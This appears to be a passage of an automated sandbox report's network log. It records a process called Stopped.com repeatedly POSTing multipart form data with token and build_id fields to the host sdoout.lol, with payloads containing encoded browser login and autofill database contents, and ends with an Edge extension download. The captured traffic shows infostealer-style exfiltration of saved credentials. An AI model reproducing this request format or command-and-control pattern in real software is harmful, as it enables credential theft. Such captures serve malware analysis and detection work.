                                                                                                                                                                                                                                                                                            Data Ascii: ------y5ppzmgln7qqimgv3wbaContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------y5ppzmgln7qqimgv3wbaContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------y5ppzmgln7qqimgv3wbaCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:02 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:02 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:03 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:03 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:03 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            18192.168.2.549961116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:04 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----ngdbs2nop8ymymymym7y
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 142457
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:04 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 6e 67 64 62 73 32 6e 6f 70 38 79 6d 79 6d 79 6d 79 6d 37 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 6e 67 64 62 73 32 6e 6f 70 38 79 6d 79 6d 79 6d 79 6d 37 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6e 67 64 62 73 32 6e 6f 70 38 79 6d 79 6d 79 6d 79 6d 37 79 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------ngdbs2nop8ymymymym7yContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------ngdbs2nop8ymymymym7yContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------ngdbs2nop8ymymymym7yCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:04 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                            Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:04 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:04 UTC11617OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:06 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            19192.168.2.549969116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:05 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----ngdbs2nop8ymymymym7y
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 493
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:05 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 6e 67 64 62 73 32 6e 6f 70 38 79 6d 79 6d 79 6d 79 6d 37 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 6e 67 64 62 73 32 6e 6f 70 38 79 6d 79 6d 79 6d 79 6d 37 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6e 67 64 62 73 32 6e 6f 70 38 79 6d 79 6d 79 6d 79 6d 37 79 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------ngdbs2nop8ymymymym7yContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------ngdbs2nop8ymymymym7yContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------ngdbs2nop8ymymymym7yCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:06 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:06 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:06 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            20192.168.2.550044142.250.186.654435136C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            X-GUploader-UploadID: AFiumC4tI9415yS_TkBQcnU9qTvpnOP28bCTbSGdM7bGouDgWs1FHxPhbkK_zWydxqLBLQ90PetV_O0
                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                            Content-Length: 154477
                                                                                                                                                                                                                                                                                            X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:13 GMT
                                                                                                                                                                                                                                                                                            Expires: Wed, 31 Dec 2025 15:58:13 GMT
                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                            Age: 70
                                                                                                                                                                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                            ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                            Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:23 UTC823INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
